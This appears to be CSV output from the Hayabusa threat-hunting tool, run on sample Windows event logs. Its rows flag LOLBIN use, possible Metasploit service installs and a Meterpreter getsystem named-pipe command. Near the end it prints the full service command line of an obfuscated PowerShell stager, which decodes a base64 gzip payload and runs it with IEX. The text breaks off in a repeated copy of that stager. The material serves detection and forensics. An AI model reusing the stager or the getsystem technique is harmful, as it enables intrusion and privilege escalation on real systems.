C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xc80 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 03:57:21.015 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x8f4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 04:05:34.164 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x92c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 04:05:34.195 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc90 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 04:55:29.037 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0xd20 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 04:55:30.037 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\makecab.exe"" C:\Windows\Logs\CBS\CbsPersist_20160818195530.log C:\Windows\Logs\CBS\CbsPersist_20160818195530.cab | Path: C:\Windows\System32\makecab.exe | PID: 0xa3c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 04:55:33.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 04:55:49.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 04:55:50.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2016-08-19 04:55:51.989 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x71c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 04:55:52.176 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x7b8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 04:55:52.364 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 04:55:53.255 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0xbc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 04:55:57.149 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xa5c | User: IEUser | LID: 0x1ceaf",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 04:55:57.542 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xa7c | User: IEUser | LID: 0x1ceaf,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 04:55:59.915 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb1c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 04:56:34.967 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdac | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 04:56:34.999 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdd0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 04:58:48.497 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xce4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 04:58:48.512 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{A4B07E49-6567-4FB8-8D39-01920E3B2357} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd14 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 04:59:33.224 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: IixaZHzxvTaopUGI | Path: %SYSTEMROOT%\ijQzlbXC.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 04:59:33.224 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: IixaZHzxvTaopUGI | Path: %SYSTEMROOT%\ijQzlbXC.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 04:59:33.224 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: IixaZHzxvTaopUGI | Path: %SYSTEMROOT%\ijQzlbXC.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:00:43.879 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfc0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 05:00:43.910 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x674 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 05:03:18.175 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,Svc: yagfag | Path: cmd.exe /c echo yagfag > \\.\pipe\yagfag | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:03:18.175 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: yagfag | Path: cmd.exe /c echo yagfag > \\.\pipe\yagfag,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:03:18.175 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: yagfag | Path: cmd.exe /c echo yagfag > \\.\pipe\yagfag | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:03:18.175 +09:00,IE10Win7,4688,medium,,Suspicious Cmd Line_Possible Meterpreter getsystem,Cmd Line: cmd.exe /c echo yagfag > \\.\pipe\yagfag | Path: C:\Windows\System32\cmd.exe | PID: 0x57c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_MeterpreterGetSystem.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 05:03:18.175 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /c echo yagfag > \\.\pipe\yagfag | Path: C:\Windows\System32\cmd.exe | PID: 0x57c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 05:04:19.379 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: XCKcRAHmHLAkajXO | Path: %SYSTEMROOT%\kAtEspLd.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:04:19.379 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: XCKcRAHmHLAkajXO | Path: %SYSTEMROOT%\kAtEspLd.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:04:19.379 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: XCKcRAHmHLAkajXO | Path: %SYSTEMROOT%\kAtEspLd.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:08:53.832 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0x274 | User: IEUser | LID: 0x1d069",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 05:10:06.597 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: mHPhVsrnnbYuDOWj | Path: %SYSTEMROOT%\AFDvMJdc.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:10:06.597 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: mHPhVsrnnbYuDOWj | Path: %SYSTEMROOT%\AFDvMJdc.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:10:06.597 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: mHPhVsrnnbYuDOWj | Path: %SYSTEMROOT%\AFDvMJdc.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:11:24.391 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: VdhURnHArteGncWS | Path: %SYSTEMROOT%\dQGFdDtG.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:11:24.391 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: VdhURnHArteGncWS | Path: %SYSTEMROOT%\dQGFdDtG.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:11:24.391 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: VdhURnHArteGncWS | Path: %SYSTEMROOT%\dQGFdDtG.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:12:53.344 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: GWRhKCtKcmQarQUS | Path: %SYSTEMROOT%\frlCVwVW.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:12:53.344 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: GWRhKCtKcmQarQUS | Path: %SYSTEMROOT%\frlCVwVW.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:12:53.344 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: GWRhKCtKcmQarQUS | Path: %SYSTEMROOT%\frlCVwVW.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:14:12.922 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: riddDteHwMfqxVOk | Path: %SYSTEMROOT%\GbzflpZs.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:14:12.922 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: riddDteHwMfqxVOk | Path: %SYSTEMROOT%\GbzflpZs.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:14:12.922 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: riddDteHwMfqxVOk | Path: %SYSTEMROOT%\GbzflpZs.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:16:40.574 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc94 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 05:16:40.574 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x754 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 05:16:40.605 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xad4 | User: IEUser | LID: 0x1ceaf",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 05:22:36.074 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: JDFZBLLIkXqjccos | Path: %SYSTEMROOT%\zqvbnLTK.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:22:36.074 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: JDFZBLLIkXqjccos | Path: %SYSTEMROOT%\zqvbnLTK.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:22:36.074 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: JDFZBLLIkXqjccos | Path: %SYSTEMROOT%\zqvbnLTK.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:24:48.043 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: tLVOxEmULrqimOQr | Path: %SYSTEMROOT%\tnKMiZjQ.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:24:48.043 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: tLVOxEmULrqimOQr | Path: %SYSTEMROOT%\tnKMiZjQ.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:24:48.043 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: tLVOxEmULrqimOQr | Path: %SYSTEMROOT%\tnKMiZjQ.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:40:21.230 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: SYyGmEHvgHiGYApk | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 05:40:21.230 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: SYyGmEHvgHiGYApk | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/